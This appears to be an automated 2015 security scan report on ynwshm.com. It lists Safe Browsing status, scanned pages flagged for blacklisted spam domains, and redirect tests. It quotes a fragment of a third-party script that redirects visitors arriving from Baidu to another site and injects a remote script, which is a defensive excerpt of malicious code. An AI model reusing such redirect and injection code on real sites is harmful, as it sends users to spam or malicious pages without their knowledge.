Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ynwshm.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ynwshm.com/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:17 GMT Accept-Ranges: bytes ETag: "e25c91c8bc14d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 21103 Content-Location: http://ynwshm.com/index.html Content-Type: text/html Last-Modified: Wed, 10 Dec 2014 21:03:44 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/index.html | 200 OK Content-Length: 21103 Content-Type: text/html | clean |
http://Js.lwtzdec.com/huishou.js | 200 OK Content-Length: 1063 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: vip.hunlianyuan.com ...[596 bytes skipped]... ) > -1) { window.opener.location.href = url } else { window.opener.location.replace(url) } } }; var referer = document.referrer; if (!referer) { return }; var rst = /https?\:\/\/([^\/]+)/i.exec(referer); var host = rst ? rst[1] : 'unknown'; if (/baidu\.com$/i.test(host) && timeallow) { var search = referer.substring(referer.indexOf('?')); jump("http://vip.hunlianyuan.com/1.html"); return } })() } catch(e) {} document.write ('<script language="javascript" type="text/javascript" src="http://js.17meiliba.com/tan.js"></script>'); | ||
http://ynwshm.com/tj.js | 200 OK Content-Length: 0 Content-Type: application/x-javascript | clean |
http://ynwshm.com/cvprbmy355998/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:22 GMT Accept-Ranges: bytes ETag: "a08d87bc8d6d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11442 Content-Location: http://ynwshm.com/cvprbmy355998/index.html Content-Type: text/html Last-Modified: Sat, 22 Nov 2014 19:51:41 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/cvprbmy355998/index.html | 200 OK Content-Length: 11442 Content-Type: text/html | clean |
http://ynwshm.com/i7rx75893341/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:24 GMT Accept-Ranges: bytes ETag: "c8796e93134d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11135 Content-Location: http://ynwshm.com/i7rx75893341/index.html Content-Type: text/html Last-Modified: Wed, 19 Nov 2014 16:12:11 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/i7rx75893341/index.html | 200 OK Content-Length: 11135 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: sklhw.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>Ñî¹âµÄ°®Çé¹ÊÊÂ9²¿-ÍÓÂÞÄá¾±»</title>
<meta name="keywords" content="Ñî¹âµÄ°®Çé¹ÊÊÂ9²¿" />
<meta name="description" content="Ñî¹âµÄ°®Çé¹ÊÊÂ9²¿ÉϺ£ÏÈÒ»ÕÕÃ÷µçÆ÷ ...[4310 bytes skipped]... | ||
http://ynwshm.com/j3av281373/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:26 GMT Accept-Ranges: bytes ETag: "46737c44702d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11148 Content-Location: http://ynwshm.com/j3av281373/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:10:40 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/j3av281373/index.html | 200 OK Content-Length: 11148 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: zoztech.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>¡¾ÎÒ¼ÒÓÐϲµçÊÓ¾çÈ«¼¯ ÓÅ¿á¡¿ÑÇÀïɳ·¬ºÅ|Ë«Óï²»ÓÃ½Ì bt</title>
<meta name="keywords" content="ÎÒ¼ÒÓÐϲµçÊÓ¾çÈ«¼¯ ÓÅ¿á" />
<meta name="description" content="ÎÒ¼ÒÓ ...[4281 bytes skipped]... | ||
http://ynwshm.com/p3bsw571372/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:28 GMT Accept-Ranges: bytes ETag: "6ca71245702d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11439 Content-Location: http://ynwshm.com/p3bsw571372/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:10:41 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/p3bsw571372/index.html | 200 OK Content-Length: 11439 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: bftyj.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>¡¾Çò¸ËÆ·ÅÆ¡¿|·½ÕýÓ²±ÊÐÐÊé</title>
<meta name="keywords" content="Çò¸ËÆ·ÅÆ" />
<meta name="description" content="Çò¸ËÆ·ÅƱ±¾©º£µíÍ͵èËÜÁÏÖÆÆ·¼Ó¹¤³§Ô³§Ãû±±¾©Ê ...[4298 bytes skipped]... | ||
http://ynwshm.com/789o4o93641/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:31 GMT Accept-Ranges: bytes ETag: "80634b7a732d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 10887 Content-Location: http://ynwshm.com/789o4o93641/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:33:39 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/789o4o93641/index.html | 200 OK Content-Length: 10887 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 0434xxg.com ...[1680 bytes skipped]... lt;div class="post_list"> <div class="dede_pages"> ÎÄÕÂÀ´Ô´£º<a href="http://ynwshm.com/789o4o93641/" title="iphone6ͼƬ»¡Ãæ ¸ÅÄî">iphone6ͼƬ»¡Ãæ ¸ÅÄî</a><br/>±¾ÎĵØÖ·£ºhttp://ynwshm.com/789o4o93641/ </div> <p>ÎåÌìЦµÀ¡£</p> <p>¸öÄ«ÃŽ£¿ÍЦ<a href="http://sdhzth.com/up4qc606699/">kimeminemÖÐÎÄ×ÖÄ»</a>£¬ËüÃǺÜÉýµ½¿ÖÅÂÒѾÇ××Թ涨ººÈ˲»µÃÏòÒ°ÊÞͶһ¿éʯ×Ó¡£<a href="http://0434xxg.com/w46ms">redlikeroses</a>²»µ«Èç´ËÒ»ÃûÐÞΪ²»¹ýÁ¶ÆøÆÚÎåÁù²ãËï´óÅÖÖ®´¦ÍûÈ¥£¬ÆäËüÊÂÇéÇصƿ´×Źź®´ø×ÅÒź¶£¬×Ô¼ºÔ¶³ÌÎäÆ÷Äã¿´¿´Äã¡£ÑÛÉñ±ä£¬Ãæ¾ßÈ˵À»ð¹âÉÁҫ֮Ͻð½Ç½ð¹âÄѵÀÍüÇس¯wshm.com/l1oq502188/" title="98°®É«³ÉÈË×ÛºÏ-ÐË¡¼ÒÔ°¶þÊÖ·¿">98°®É«³ÉÈË×ÛºÏ-ÐË¡¼ÒÔ°¶þÊÖ·¿</a><br /> <li><a href="http://ynwshm.com/4uvvd54632/" title="¡¾·òÆÞ¶àÈ˽»»»ÓÎÏ·¹ÊÊ¡¿Ä¸×Óͨ¼éÏà¹ØµçÓ° È«¼¯-Áú´¨±£°²¹«Ë¾">¡¾·òÆÞ¶àÈ˽»»»ÓÎÏ·¹ÊÊ¡¿Ä¸×Óͨ¼éÏà¹ØµçÓ° È«¼¯-Áú´¨±£°²¹«Ë¾</a&g ...[2140 bytes skipped]... | ||
http://ynwshm.com/654sd16491/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:32 GMT Accept-Ranges: bytes ETag: "a60214742d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11407 Content-Location: http://ynwshm.com/654sd16491/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:37:56 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/654sd16491/index.html | 200 OK Content-Length: 11407 Content-Type: text/html | clean |
http://ynwshm.com/gjgr21423/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:34 GMT Accept-Ranges: bytes ETag: "94f2f84b742d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11570 Content-Location: http://ynwshm.com/gjgr21423/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:39:30 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/gjgr21423/index.html | 200 OK Content-Length: 11570 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hbsdjsj.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>¡¾»ªº½º½¿ÕѧУÔõôÑù¡¿|¹¬¶·Ð¡ËµËÝÔ´txtÏÂÔØ</title>
<meta name="keywords" content="»ªº½º½¿ÕѧУÔõôÑù" />
<meta name="description" content="»ªº½º½¿ÕѧУÔõôÑù¶ ...[4236 bytes skipped]... | ||
http://ynwshm.com/s3tzt2062/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:36 GMT Accept-Ranges: bytes ETag: "e27dba0752d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11271 Content-Location: http://ynwshm.com/s3tzt2062/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:49:01 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/s3tzt2062/index.html | 200 OK Content-Length: 11271 Content-Type: text/html | clean |
http://ynwshm.com/eqmqvg071/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:38 GMT Accept-Ranges: bytes ETag: "3227b7a0752d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 10689 Content-Location: http://ynwshm.com/eqmqvg071/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:49:02 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/eqmqvg071/index.html | 200 OK Content-Length: 10689 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: yuliaoyjl.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>¡¾wwwbt¼Ó¹¤³§com¡¿ÎåÔÂÌìÏã¸Ûºì¹ÝÑݳª»áÎåÔÂÌìÏã¸Ûºì¹ÝÑݳª»á-ɽÎ÷ÍòÈÙ×æËïÈý´ú4pÖÖ×Ó</title>
<meta name="keywords" content="wwwbt¼Ó¹¤³§com" />
<meta name="descrip ...[4308 bytes skipped]... | ||
http://ynwshm.com/vcrmgn392999/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:39 GMT Accept-Ranges: bytes ETag: "c6c0b43f6a2d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 12933 Content-Location: http://ynwshm.com/vcrmgn392999/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 13:27:35 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/vcrmgn392999/index.html | 200 OK Content-Length: 12933 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: huanqiu99.net <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>¡¾convert to rinex¡¿ÎäÏÀƬ´óÈ«|cctvµçÊÓ¾çȺӢ»ãcctv.com</title>
<meta name="keywords" content="convert to rinex" />
<meta name="description" content="convert t ...[4196 bytes skipped]... | ||
http://ynwshm.com/4ufkcqz902312/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:41 GMT Accept-Ranges: bytes ETag: "8cd9fac26c2d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 11368 Content-Location: http://ynwshm.com/4ufkcqz902312/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 13:45:34 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/4ufkcqz902312/index.html | 200 OK Content-Length: 11368 Content-Type: text/html | clean |
http://ynwshm.com/ia78854877/ | HTTP/1.1 200 OK Date: Wed, 04 Mar 2015 22:35:43 GMT Accept-Ranges: bytes ETag: "68a7bd87722d01:5fc" Server: Microsoft-IIS/6.0 Content-Length: 10539 Content-Location: http://ynwshm.com/ia78854877/index.html Content-Type: text/html Last-Modified: Mon, 17 Nov 2014 14:26:52 GMT X-Powered-By: ASP.NET | clean |
http://ynwshm.com/ia78854877/index.html | 200 OK Content-Length: 10539 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ynwshm.com
Result:
HTTP/1.1 200 OK
Date: Wed, 04 Mar 2015 22:35:17 GMT
Accept-Ranges: bytes
ETag: "e25c91c8bc14d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 21103
Content-Location: http://ynwshm.com/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 21:03:44 GMT
X-Powered-By: ASP.NET
...21103 bytes of data.
GET / HTTP/1.1
Host: ynwshm.com
Result:
HTTP/1.1 200 OK
Date: Wed, 04 Mar 2015 22:35:17 GMT
Accept-Ranges: bytes
ETag: "e25c91c8bc14d01:5fc"
Server: Microsoft-IIS/6.0
Content-Length: 21103
Content-Location: http://ynwshm.com/index.html
Content-Type: text/html
Last-Modified: Wed, 10 Dec 2014 21:03:44 GMT
X-Powered-By: ASP.NET
...21103 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ynwshm.com
Referer: http://www.google.com/search?q=ynwshm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ynwshm.com
Referer: http://www.google.com/search?q=ynwshm.com
Result:
The result is similar to the first query. There are no suspicious redirects found.